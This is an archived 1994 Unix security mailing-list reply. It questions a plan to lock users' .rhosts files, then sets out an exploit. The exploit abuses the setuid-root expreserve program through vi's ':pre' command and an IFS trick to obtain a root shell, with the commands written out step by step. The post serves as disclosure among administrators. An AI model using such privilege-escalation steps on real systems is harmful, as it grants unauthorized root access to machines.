Re: chmod 000 .rhosts - works?

Charles Howes (chowes@helix.net)
Sat, 15 Oct 1994 04:21:20 -0700 (PDT)

Messages sorted by: [ date ][ thread ][ subject ][ author ]
Next message: George Hodson: "Directory Permissions"
Previous message: David Vincenzetti: "Re: Internet worm source code"
In reply to: James Seng: "Re: Internet Worm"
Next in thread: jsz: "Re: chmod 000 .rhosts - works?"

On Sat, 15 Oct 1994, James Seng wrote:

> Anyway, what i did on my system is put a .rhosts file in every user 
> directory. chmod 000 .rhosts and chown root .rhosts. Not all user needs 
> .rhosts file. Those who wants to use them email me and i will chown back 
> to them. (any problem with that? :-)
> 
> James Seng Ching Hong ~{W/Uq:j~}	
> Technet Student Consultant, Technet Unit
> Internet: jseng@solomon.technet.sg 

If the users own their home directories, then what prevents them from
removing that file?
  Oh, I detect an OS-dependent feature here...

ObBug: vi runs expreserve when it crashes or you type ':pre' (on some
  versions).  Expreserve is setuid root.  Expreserve runs /bin/mail
  with 'system()'.  So, do the following:
    % cd /tmp
    % cp /bin/sh fubar
    % cat > bin
    chmod 4755 fubar
    ^D
    % chmod u+x fubar
    % setenv IFS=/
    % vi
    :pre
    :q
    % fubar
    #
  Some versions of expreserve don't have the hole.
  Some versions of vi don't have the :pre command.
  One does not imply the other.

Argh.  Am I repeating 8lgm material here?
--
Charles Howes -- chowes@helix.net
 Always tell the truth, then you make it the other bloke's problem! 
 - Sean Connery, 1971

Next message: George Hodson: "Directory Permissions"
Previous message: David Vincenzetti: "Re: Internet worm source code"
In reply to: James Seng: "Re: Internet Worm"
Next in thread: jsz: "Re: chmod 000 .rhosts - works?"